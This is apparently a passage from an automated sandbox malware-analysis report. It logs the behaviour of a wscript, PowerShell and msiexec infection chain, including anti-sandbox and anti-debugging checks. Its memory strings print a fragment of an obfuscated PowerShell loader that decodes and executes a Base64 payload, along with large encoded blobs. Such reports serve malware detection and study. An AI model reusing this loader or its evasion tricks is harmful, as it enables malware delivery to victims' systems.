              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4909Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4961Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6094Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3758Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.2 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.2 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568Thread sleep count: 7445 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568Thread sleep time: -22335000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568Thread sleep count: 2540 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6568Thread sleep time: -7620000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_223210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_223210F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22326580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,7_2_22326580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: wscript.exe, 00000000.00000002.2187705658.000002040E44D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup user ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27019GameDVR and Broadcast User Service_27019Bluetooth User Support Service_27019CaptureService_27019Clipboard User Service_27019Connected Devices Platform User Service_27019ConsentUX_27019CredentialEnrollmentManagerUserSvc_27019DeviceAssociationBroker_27019DevicePicker_27019DevicesFlow_27019MessagingService_27019Sync Host_27019Contact Data_27019PrintWorkflow_27019Udk User Service_27019User Data Storage_27019terinI
              Source: msiexec.exe, 0000000A.00000003.2634007200.0000000004F11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOSJm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0Vhp
              Source: wscript.exe, 00000000.00000003.2186562250.000002040E46E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup user ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27019GameDVR and Broadcast User Service_27019Bluetooth User Support Service_27019CaptureService_27019Clipboard User Service_27019Connected Devices Platform User Service_27019ConsentUX_27019CredentialEnrollmentManagerUserSvc_27019DeviceAssociationBroker_27019DevicePicker_27019DevicesFlow_27019MessagingService_27019Sync Host_27019Contact Data_27019PrintWorkflow_27019O
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE72E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QIRR5opfs+E8T4AqLl/QkrppJt/SUF9QQFvQygYr3ZK/2RZAv54XF9dd0JKd8l7WBuqAkIdf513zalEn113Qkuryw+q/hlE/113QkrqQOZvh2gv0Ap2RbQoP0pKHKifT1OQyFmwkU2mMUF78QFvQyUDai5CHXz4W8tO2F0feVcmFX9DsOFXxEzIE0pKHd7gP4d5lyYVf0K6qQhupCgTSkodQVdd4oC8SeBa2E3zTkWVG91dSg7TMLbWFPj/Gsg0FqsvzySzg4khp8pF/Wsj9BqQEexP6L5Vhh1/fH/WX1JIDj1kX/17QkuGoF5wd3DuXDsKck4dfg3rskNSS1+dbL1V67WCHX9CdCY8WlocHWdfDtl8Gg18nU35HG9QI2rSTh19UQ+9TYL3Rt4sOg1/oWA4CzCp97WB/gqEGAac5VVmCIgMxgqkScoKbd4Vr2wj0Lsy7xThpS7q13C+BiNurVINfjxnKQ2o2msvf9L6XONwVW9Abwne2q1/UnY49knmz6TlRaP5qOKQVW9AWctZVWodf0BJ63zmbTFvQyg7qVZOHX1lU0dRlF4Zf0PiGoGVah1/QeqKZ1JIO2uCTh1+2ZUG0gFXDe9jczpGUFl7epLaPQDTUrjnpSAYz9JrMQMG/Biv0moHRp9IChelQ7wj2kDhQ0IL2X9CSh1/Qkodf0JKHX9CSh1/Qkodf0JLlwhOI4yY96zTfH48zt7sJg19Zz5/UnYpLwMRwjWLsxXi/Ca11UTumozOrxMKWQDoyDdLx1qySGXg2dxBVhbL32eUj3h/0OPgWW9AbAsfQkoc531W3X9CSh1/Qkodf0JKHX9CSh1/Qkodf0JLq0nJTFvf4S3ZMJcLX5/C+aKblAEjdlL9PF8Exss71vLFacNAKjFmqd8vSozHnrM4Rb2gGgbQyPtDMScmYwMgiMDedcuRbC1PfUNGErV/Qkodf0JKHX9CSh1/Qkodf0JKHX9CS+AUz67bh60P027Yikpw9DxGm/6wo0yBEScdZL81d0JI4Al2D0Qxrz7wdnhN0SOgxVt4TPztAsBuUMHf+S+cqE2K7o3twSxCKbbHoKzMWq9u1YrPPTwaq5C1YQXAggtfO
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhvF097.tmp.10.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: wscript.exe, 00000000.00000003.2183346178.000002040E466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyp
              Source: powershell.exe, 00000002.00000002.2331664517.000001ACFDCDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_13-34025
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F780E0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,4_2_06F780E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22322639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_22322639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22324AB4 mov eax, dword ptr fs:[00000030h]7_2_22324AB4
